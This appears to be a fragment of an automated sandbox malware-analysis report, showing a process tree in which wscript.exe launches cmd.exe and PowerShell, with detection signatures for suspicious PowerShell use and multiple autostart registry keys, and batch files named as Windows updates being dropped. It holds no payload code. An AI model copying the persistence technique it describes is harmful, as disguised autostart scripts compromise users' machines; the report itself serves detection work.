                        cmd.exe  signatures: Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly)
                          powershell.exe  signature: Creates multiple autostart registry keys
                            dropped: C:\Users\user\...\WindowsUpdate_394.bat (ASCII)
                            WerFault.exe
                          conhost.exe
                        conhost.exe
                    wscript.exe
                      cmd.exe
                        2 other processes
                          2 other processes
                            dropped: C:\Users\user\...\WindowsUpdate_801.bat (ASCII)
                            WerFault.exe
                    6 other processes
                      cmd.exe
                        2 other processes
                          2 other processes
                            dropped: C:\Users\user\...\WindowsUpdate_87.bat (ASCII)
                            WerFault.exe
                      cmd.exe
                        2 other processes
                          2 other processes
                            dropped: C:\Users\user\...\WindowsUpdate_412.bat (ASCII)
                            WerFault.exe
                      cmd.exe
                        2 other processes
                          2 other processes
                      3 other processes
                        6 other processes
                          6 other processes
                            WerFault.exe
                            WerFault.exe
